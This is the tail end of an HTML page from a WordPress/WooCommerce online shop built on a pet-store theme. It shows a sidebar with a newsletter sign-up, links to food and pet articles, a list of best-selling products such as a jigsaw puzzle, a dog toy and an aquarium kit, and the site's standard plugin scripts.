</p></form>	</div><!-- #respond -->
				</div>
		</div>
	
	<div class="clear"></div>
</div>
			</div>
		
			</div>

</div>


				
			</main></div>		</div>
		<div class="col-lg-4 col-md-4">
			<div id="sidebar">    
    <aside id="mc4wp_form_widget-2" class="widget widget_mc4wp_form_widget"><h3 class="widget-title">Newsletter</h3><script>(function() {
	window.mc4wp = window.mc4wp || {
		listeners: [],
		forms: {
			on: function(evt, cb) {
				window.mc4wp.listeners.push(
					{
						event   : evt,
						callback: cb
					}
				);
			}
		}
	}
})();
</script><!-- Mailchimp for WordPress v4.7.5 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-263" method="post" data-id="263" data-name="Newsletter" ><div class="mc4wp-form-fields"><p>
	<label>Email address: 
		<input type="email" name="EMAIL" placeholder="Your email address" required />
</label>
</p>

<p>
	<input type="submit" value="Sign up" />
</p></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1585055681" /><input type="hidden" name="_mc4wp_form_id" value="263" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></aside><style>
.rpwe-block ul{list-style:none!important;margin-left:0!important;padding-left:0!important;}.rpwe-block li{border-bottom:1px solid #eee;margin-bottom:10px;padding-bottom:10px;list-style-type: none;}.rpwe-block a{display:inline!important;text-decoration:none;}.rpwe-block h3{background:none!important;clear:none;margin-bottom:0!important;margin-top:0!important;font-weight:400;font-size:12px!important;line-height:1.5em;}.rpwe-thumb{border:1px solid #EEE!important;box-shadow:none!important;margin:2px 10px 2px 0;padding:3px!important;}.rpwe-summary{font-size:12px;}.rpwe-time{color:#bbb;font-size:11px;}.rpwe-comment{color:#bbb;font-size:11px;padding-left:5px;}.rpwe-alignleft{display:inline;float:left;}.rpwe-alignright{display:inline;float:right;}.rpwe-aligncenter{display:block;margin-left: auto;margin-right: auto;}.rpwe-clearfix:before,.rpwe-clearfix:after{content:"";display:table !important;}.rpwe-clearfix:after{clear:both;}.rpwe-clearfix{zoom:1;}
</style>
	<aside id="rpwe_widget-2" class="widget rpwe_widget recent-posts-extended"><h3 class="widget-title">Interesting Articles</h3><div  class="rpwe-block "><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeanmaxe.com/fine-food-photography-by-studio-mixture/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeanmaxe.com/wp-content/uploads/2020/03/Studio-Mixture-Food-Photography-4-45x45.jpg" alt="Fine Food Photography By Studio Mixture"></a><h3 class="rpwe-title"><a href="https://jeanmaxe.com/fine-food-photography-by-studio-mixture/" title="Permalink to Fine Food Photography By Studio Mixture" rel="bookmark">Fine Food Photography By Studio Mixture</a></h3><time class="rpwe-time published" datetime="2020-03-16T21:46:18+00:00">March 16, 2020</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeanmaxe.com/tracee-ellis-ross-on-finding-her-strength-i-actively-love-myself-by-cooking/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeanmaxe.com/wp-content/uploads/2020/03/tracee-ellis-ross-1-600x450-1-45x45.jpg" alt="Tracee Ellis Ross on Finding Her Strength: ‘I Actively Love Myself By Cooking’"></a><h3 class="rpwe-title"><a href="https://jeanmaxe.com/tracee-ellis-ross-on-finding-her-strength-i-actively-love-myself-by-cooking/" title="Permalink to Tracee Ellis Ross on Finding Her Strength: ‘I Actively Love Myself By Cooking’" rel="bookmark">Tracee Ellis Ross on Finding Her Strength: ‘I Actively Love Myself By Cooking’</a></h3><time class="rpwe-time published" datetime="2020-03-15T19:57:10+00:00">March 15, 2020</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeanmaxe.com/5-meals-to-make-you-happy/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeanmaxe.com/wp-content/uploads/2020/03/dessert-45x45.jpg" alt="5 Meals To Make You Happy"></a><h3 class="rpwe-title"><a href="https://jeanmaxe.com/5-meals-to-make-you-happy/" title="Permalink to 5 Meals To Make You Happy" rel="bookmark">5 Meals To Make You Happy</a></h3><time class="rpwe-time published" datetime="2020-03-15T16:44:22+00:00">March 15, 2020</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeanmaxe.com/back-to-school-training-goals/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeanmaxe.com/wp-content/uploads/2020/03/dog-451643-45x45.jpg" alt="Back to School Training Goals"></a><h3 class="rpwe-title"><a href="https://jeanmaxe.com/back-to-school-training-goals/" title="Permalink to Back to School Training Goals" rel="bookmark">Back to School Training Goals</a></h3><time class="rpwe-time published" datetime="2020-03-12T00:37:54+00:00">March 12, 2020</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeanmaxe.com/whats-the-difference-between-ice-cream-and-gelato-all-your-frozen-dessert-questions-answered/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeanmaxe.com/wp-content/uploads/2020/03/ice_cream_ice_caseyfeehan_7-7-16-5-45x45.jpg" alt="What’s the Difference Between Ice Cream and Gelato? All Your Frozen Dessert Questions, Answered"></a><h3 class="rpwe-title"><a href="https://jeanmaxe.com/whats-the-difference-between-ice-cream-and-gelato-all-your-frozen-dessert-questions-answered/" title="Permalink to What’s the Difference Between Ice Cream and Gelato? All Your Frozen Dessert Questions, Answered" rel="bookmark">What’s the Difference Between Ice Cream and Gelato? All Your Frozen Dessert Questions, Answered</a></h3><time class="rpwe-time published" datetime="2020-03-09T17:01:28+00:00">March 9, 2020</time></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></aside><aside id="woocommerce_products-2" class="widget woocommerce widget_products"><h3 class="widget-title">Best Selling Products</h3><ul class="product_list_widget"><li>
	
	<a href="https://jeanmaxe.com/product/stare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa/">
		<img width="300" height="300" src="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-300x300.jpg 300w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-150x150.jpg 150w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-45x45.jpg 45w, https://jeanmaxe.com/wp-content/uploads/2020/03/Old-Town-Kosice-Slovakia-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">Staré Mesto, Košice, Slovensko - Letecký pohľad na mesto A-9011645 (skladačka 20x30 Premium, 1000 ks, vyrobené v USA!)</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>45.00</span>
	</li>
<li>
	
	<a href="https://jeanmaxe.com/product/hilike-pet-travel-bag-for-dogcat-weekend-tote-organizer-bag-for-dogs-travel-incudes1-dog-tote-bag2-dog-food-carriers-bag2-pet-silicone-collapsible-bowls-black/">
		<img width="300" height="300" src="https://jeanmaxe.com/wp-content/uploads/2020/03/51aOInG6RyL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://jeanmaxe.com/wp-content/uploads/2020/03/51aOInG6RyL-300x300.jpg 300w, https://jeanmaxe.com/wp-content/uploads/2020/03/51aOInG6RyL-100x100.jpg 100w, https://jeanmaxe.com/wp-content/uploads/2020/03/51aOInG6RyL-150x150.jpg 150w, https://jeanmaxe.com/wp-content/uploads/2020/03/51aOInG6RyL-45x45.jpg 45w, https://jeanmaxe.com/wp-content/uploads/2020/03/51aOInG6RyL.jpg 500w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">Hilike Pet Travel Bag for Dog&amp;Cat -Weekend Tote Organizer Bag for Dogs Travel -</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>35.95</span>
	</li>
<li>
	
	<a href="https://jeanmaxe.com/product/godog-just-for-me-gators-with-chew-guard-tough-plush-dog-toy/">
		<img width="300" height="300" src="https://jeanmaxe.com/wp-content/uploads/2020/03/51oUufbSxrL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://jeanmaxe.com/wp-content/uploads/2020/03/51oUufbSxrL-300x300.jpg 300w, https://jeanmaxe.com/wp-content/uploads/2020/03/51oUufbSxrL-100x100.jpg 100w, https://jeanmaxe.com/wp-content/uploads/2020/03/51oUufbSxrL-150x150.jpg 150w, https://jeanmaxe.com/wp-content/uploads/2020/03/51oUufbSxrL-45x45.jpg 45w, https://jeanmaxe.com/wp-content/uploads/2020/03/51oUufbSxrL.jpg 500w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">goDog Just for Me Gators with Chew Guard Tough Plush Dog Toy</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>6.68</span>
	</li>
<li>
	
	<a href="https://jeanmaxe.com/product/koller-products-6-5-gallon-aquarium-kit-with-power-filter-and-led-lighting-ap650/">
		<img width="300" height="300" src="https://jeanmaxe.com/wp-content/uploads/2020/03/51Zt358VECL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://jeanmaxe.com/wp-content/uploads/2020/03/51Zt358VECL-300x300.jpg 300w, https://jeanmaxe.com/wp-content/uploads/2020/03/51Zt358VECL-100x100.jpg 100w, https://jeanmaxe.com/wp-content/uploads/2020/03/51Zt358VECL-150x150.jpg 150w, https://jeanmaxe.com/wp-content/uploads/2020/03/51Zt358VECL-45x45.jpg 45w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">Koller Products 6.5-Gallon Aquarium Kit with Power Filter and LED Lighting, (AP650)</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>36.98</span>
	</li>
<li>
	
	<a href="https://jeanmaxe.com/product/shark-mini-motorized-brush-for-pet-hair-stairs-upholstery-and-carpet-debris-for-use-navigator-nv650-and-nv750-series-vacuums-nvmmb750/">
		<img width="300" height="300" src="https://jeanmaxe.com/wp-content/uploads/2020/03/41tOL2B6mQVL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://jeanmaxe.com/wp-content/uploads/2020/03/41tOL2B6mQVL-300x300.jpg 300w, https://jeanmaxe.com/wp-content/uploads/2020/03/41tOL2B6mQVL-100x100.jpg 100w, https://jeanmaxe.com/wp-content/uploads/2020/03/41tOL2B6mQVL-150x150.jpg 150w, https://jeanmaxe.com/wp-content/uploads/2020/03/41tOL2B6mQVL-45x45.jpg 45w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">Shark Mini Motorized Brush for Pet Hair, Stairs, Upholstery and Carpet Debris for Use Navigator NV650</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>49.99</span>
	</li>
</ul></aside><aside id="nav_menu-2" class="widget widget_nav_menu"><div class="menu-legal-menu-container"><ul id="menu-legal-menu" class="menu"><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6"><a href="/terms-of-service">Terms of Service</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8"><a href="/privacy-policy">Privacy Policy</a></li>
<li id="menu-item-12" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12"><a href="/dmca">DMCA</a></li>
<li id="menu-item-14" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14"><a href="/cookie-privacy-policy">Cookie Privacy Policy</a></li>
</ul></div></aside>	
</div>		</div>
	</div>
</main>


    <footer role="contentinfo">
                <div class="footertown">
            <div class="container">
                <div class="row">
                     
                     
                     
                                    </div>
            </div>
        </div>
        <div id="footer" class="copyright-wrapper">
            <div class="container">
                <div class="copyright">
                    <p>Copyright 2018 <a href=https://www.themescaliber.com/themes/free-animal-pet-wordpress-theme/ target='_blank'>Pet Store WordPress Theme</a></p>
                </div>
                <div class="clear"></div>  
            </div>
        </div>

                                      <a href="#" class="scrollup right"><span>Back to Top<i class="fas fa-arrow-right"></i></span><span class="screen-reader-text">Back to Top</span></a>
                        
        <script>(function() {function maybePrefixUrlField() {
	if (this.value.trim() !== '' && this.value.indexOf('http') !== 0) {
		this.value = "http://" + this.value;
	}
}

var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]');
if (urlFields) {
	for (var j=0; j < urlFields.length; j++) {
		urlFields[j].addEventListener('blur', maybePrefixUrlField);
	}
}
})();</script><script type="application/ld+json">{"@context":"https:\/\/schema.org\/","@graph":[{"@context":"https:\/\/schema.org\/","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":{"name":"Home","@id":"https:\/\/jeanmaxe.com"}},{"@type":"ListItem","position":2,"item":{"name":"Puzzle","@id":"https:\/\/jeanmaxe.com\/product-category\/puzzle\/"}},{"@type":"ListItem","position":3,"item":{"name":"Star\u00e9 Mesto, Ko\u0161ice, Slovensko &amp;#8211; Leteck\u00fd poh\u013ead na mesto A-9011645 (sklada\u010dka 20&amp;#215;30 Premium, 1000 ks, vyroben\u00e9 v USA!)","@id":"https:\/\/jeanmaxe.com\/product\/stare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa\/"}}]},{"@context":"https:\/\/schema.org\/","@type":"Product","@id":"https:\/\/jeanmaxe.com\/product\/stare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa\/#product","name":"Star\u00e9 Mesto, Ko\u0161ice, Slovensko - Leteck\u00fd poh\u013ead na mesto A-9011645 (sklada\u010dka 20x30 Premium, 1000 ks, vyroben\u00e9 v USA!)","url":"https:\/\/jeanmaxe.com\/product\/stare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa\/","description":"Star\u00e9 Mesto, Ko\u0161ice, Slovensko - Leteck\u00fd poh\u013ead na mesto 9011645 (sklada\u010dka 20x30 Premium, 1000 ks, vyroben\u00e9 v USA!)\r\n \tRozmery v\u00fdrobku s\u00fa 20 x 30 palcov, 1 000 kusov\r\n \t100% vyroben\u00e9 v Amerike!\r\n \t\u0160pi\u010dkov\u00fd arch\u00edvny papier a atrament - drevotrieskov\u00e1 doska hrubej triedy A\r\n \tPrejdite si tis\u00edce dostupn\u00fdch obr\u00e1zkov a kliknite na tla\u010didlo Lucerna","image":"https:\/\/jeanmaxe.com\/wp-content\/uploads\/2020\/03\/Old-Town-Kosice-Slovakia.jpg","sku":314,"offers":[{"@type":"Offer","price":"45.00","priceValidUntil":"2021-12-31","priceSpecification":{"price":"45.00","priceCurrency":"USD","valueAddedTaxIncluded":"false"},"priceCurrency":"USD","availability":"http:\/\/schema.org\/InStock","url":"https:\/\/jeanmaxe.com\/product\/stare-mesto-kosice-slovensko-letecky-pohlad-na-mesto-a-9011645-skladacka-20x30-premium-1000-ks-vyrobene-v-usa\/","seller":{"@type":"Organization","name":"Jean Maxe","url":"https:\/\/jeanmaxe.com"}}]}]}</script>	<script type="text/javascript">
		var c = document.body.className;
		c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
		document.body.className = c;
	</script>
	<script type='text/javascript' src='https://jeanmaxe.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/jeanmaxe.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.0.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_single_product_params = {"i18n_required_rating_text":"Please select a rating","review_rating_required":"yes","flexslider":{"rtl":false,"animation":"slide","smoothHeight":true,"directionNav":false,"controlNav":"thumbnails","slideshow":false,"animationSpeed":500,"animationLoop":false,"allowOneSlide":false},"zoom_enabled":"","zoom_options":[],"photoswipe_enabled":"","photoswipe_options":{"shareEl":false,"closeOnScroll":false,"history":false,"hideAnimationDuration":0,"showAnimationDuration":0},"flexslider_enabled":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/plugins/woocommerce/assets/js/frontend/single-product.min.js?ver=4.0.1'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.0.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_d19a2a8be367ae0c278d4a0b5e51c548","fragment_name":"wc_fragments_d19a2a8be367ae0c278d4a0b5e51c548","request_timeout":"5000"};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4.0.1'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/themes/pet-animal-store/js/jquery.superfish.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-includes/js/comment-reply.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-includes/js/wp-embed.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://jeanmaxe.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms.min.js?ver=4.7.5'></script>

		<!-- Cookie Notice plugin v1.2.51 by Digital Factory https://dfactory.eu/ -->
		<div id="cookie-notice" role="banner" class="cookie-notice-hidden cookie-revoke-hidden cn-position-bottom" aria-label="Cookie Notice" style="background-color: #000;"><div class="cookie-notice-container" style="color: #fff;"><span id="cn-notice-text" class="cn-text-container">We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.</span><span id="cn-notice-buttons" class="cn-buttons-container"><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Accept</a><a href="#" id="cn-refuse-cookie" data-cookie-set="refuse" class="cn-set-cookie cn-button bootstrap button">Refuse</a><a href="https://jeanmaxe.com/cookie-privacy-policy/" target="_blank" id="cn-more-info" class="cn-more-info cn-button bootstrap button">Cookie Privacy Policy</a></span></div>
			<div class="cookie-revoke-container" style="color: #fff;"><span id="cn-revoke-text" class="cn-text-container">You can revoke your consent any time using the Revoke consent button.</span><span id="cn-revoke-buttons" class="cn-buttons-container"><a href="#" class="cn-revoke-cookie cn-button bootstrap button">Revoke consent</a></span>
			</div>
		</div>
		<!-- / Cookie Notice plugin -->    </footer>

</body>
</html>
